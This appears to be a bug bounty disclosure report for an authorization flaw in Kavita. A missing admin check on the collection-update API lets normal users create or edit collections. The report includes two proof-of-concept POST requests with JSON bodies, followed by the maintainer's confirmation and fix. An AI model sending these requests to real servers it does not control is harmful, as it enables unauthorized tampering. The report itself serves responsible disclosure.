IDOR allows to create new collection or modify a existing one in kareadita/kavita

Valid

Reported on

Aug 8th 2022


Description

A normal user can create a new collection with the provided book ids or add new books to an existing collection, whose operations should be only executed by the administrator.

This is possible due to an missing administrative role check in the /api/collection/update-for-series API endpoint.

Proof of Concept

Create a new collection:

1 - Send the following request, where collectionTagId=0 attribute value, indicates the creation of a new collection and the seriesID array attribute contains all the book ids that will be added to the collection:

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":0,"collectionTagTitle":"Collection3","seriesIds":[1,2,3,4,5]}

Add new books to an existing collection:

1 - Send the following request, where collection-id value has the target collection id, and the seriesID array attribute contains all the new book ids that will be added to the collection:

POST http://localhost:5000/api/collection/update-for-series
Authorization: Bearer <token>
Content-Type: application/json

{"collectionTagId":<collection-id>,"collectionTagTitle":"New title","seriesIds":[3,4,5]}

Impact

An authenticated attacker can create a new collection or modify the contents of an existing one without any authentication or authorization checks.

We are processing your report and will contact the kareadita/kavita team within 24 hours. a month ago
We have contacted a member of the kareadita/kavita team and are waiting to hear back a month ago
kareadita/kavita maintainer has acknowledged this report a month ago
Joseph Milazzo
a month ago

Maintainer


Is this on v0.5.4 only or on 0.5.4.2 (the new hotfix which addressed your last round of vulnerabilities)?

vultza modified the report
a month ago
vultza
a month ago

Researcher


It targets v0.5.4.2. I just modified the original report, because I submitted this report before the hotfix. The vulnerability still exists, missing an administrative check, but now is only possible if the attacker is authenticated as normal user.

Joseph Milazzo validated this vulnerability a month ago

I did confirm it, one line of missing code. Fixed locally, planned for next Stable. Thanks again for the report.

vultza has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the kareadita/kavita team. We will try again in 7 days. a month ago
Joseph Milazzo confirmed that a fix has been merged on ae891c a month ago
Joseph Milazzo has been awarded the fix bounty
to join this conversation